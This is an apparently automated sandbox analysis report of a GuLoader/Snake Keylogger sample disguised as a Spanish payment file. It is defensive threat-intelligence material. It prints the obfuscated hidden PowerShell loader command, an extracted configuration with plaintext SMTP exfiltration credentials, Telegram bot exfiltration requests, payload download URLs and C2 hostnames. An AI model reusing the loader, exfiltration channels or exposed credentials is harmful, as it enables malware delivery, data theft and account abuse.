Edit tour

Windows Analysis Report
PAGO FRAS. AGOSTO 2024..exe

Overview

General Information

Sample name:	PAGO FRAS. AGOSTO 2024..exe
Analysis ID:	1538463
MD5:	400ae56b0e2f429c20f563959042b2e9
SHA1:	383b18e2e55a4f7bea251cc82aec9cdae9f22fed
SHA256:	7e6de6e460ec2322a30dfeca3a723811d3ac15486fa2139a3454edbc7b1927df
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

PAGO FRAS. AGOSTO 2024..exe (PID: 7408 cmdline: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe" MD5: 400AE56B0E2F429C20F563959042B2E9)

powershell.exe (PID: 7432 cmdline: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "comercial@inplasval.es", "Password": "Comercialplastico3.", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.1875277086.0000000009583000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7808	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 62508

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)", CommandLine: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", ParentImage: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe, ParentProcessId: 7408, ParentProcessName: PAGO FRAS. AGOSTO 2024..exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)", ProcessId: 7432, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:04:11.057764+0200	2803305	3	Unknown Traffic	192.168.2.4	62512	188.114.97.3	443	TCP
2024-10-21T11:04:13.894461+0200	2803305	3	Unknown Traffic	192.168.2.4	62516	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:04:09.084667+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	62510	158.101.44.242	80	TCP
2024-10-21T11:04:10.365945+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	62510	158.101.44.242	80	TCP
2024-10-21T11:04:11.756572+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	62513	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:04:03.422209+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	62508	142.250.185.206	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "comercial@inplasval.es", "Password": "Comercialplastico3.", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: PAGO FRAS. AGOSTO 2024..exe

Virustotal: Detection: 20%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_228387A8 CryptUnprotectData,		4_2_228387A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_22838EF1 CryptUnprotectData,		4_2_22838EF1

Source: PAGO FRAS. AGOSTO 2024..exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62511 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:62508 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:62509 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62527 version: TLS 1.2

Source: PAGO FRAS. AGOSTO 2024..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: em.Core.pdbFp3 source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_00406033 FindFirstFileA,FindClose,	0_2_00406033
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055D1
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 001FF45Dh	4_2_001FF2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 001FF45Dh	4_2_001FF4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 001FFC19h	4_2_001FF961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283BA76h	4_2_2283B7A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22839280h	4_2_22838FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22837EB5h	4_2_22837B78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov esp, ebp	4_2_2283B081
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22836733h	4_2_22836488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22830741h	4_2_22830498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22832151h	4_2_22831EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283E386h	4_2_2283E0B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22837571h	4_2_228372C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283C396h	4_2_2283C0C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22835179h	4_2_22834ED0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22830B99h	4_2_228308F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283F5C6h	4_2_2283F2F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228332B1h	4_2_22833008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22836CC1h	4_2_22836A18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228348C9h	4_2_22834620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283DEF6h	4_2_2283DC28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228362D9h	4_2_22836030
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283BF06h	4_2_2283BC38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228302E9h	4_2_22830040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22831CF9h	4_2_22831A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22833709h	4_2_22833460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283F136h	4_2_2283EE68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22837119h	4_2_22836E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22834D21h	4_2_22834A78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283D146h	4_2_2283CE78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22835A29h	4_2_22835780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283FA56h	4_2_2283F788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283DA66h	4_2_2283D798
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22831449h	4_2_228311A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22832E59h	4_2_22832BB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22835E81h	4_2_22835BD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283ECA6h	4_2_2283E9D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283CCB6h	4_2_2283C9E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228318A1h	4_2_228315F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228325A9h	4_2_22832300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283D5D6h	4_2_2283D308
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283B5E6h	4_2_2283B318
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228379C9h	4_2_22837720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 228355D1h	4_2_22835328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22830FF1h	4_2_22830D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283E816h	4_2_2283E548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 22832A01h	4_2_22832758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2283C826h	4_2_2283C558

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:62510 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:62513 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:62516 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62508 -> 142.250.185.206:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:62512 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62511 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Oct 2024 09:04:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.1866731311.0000000007837000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: PAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
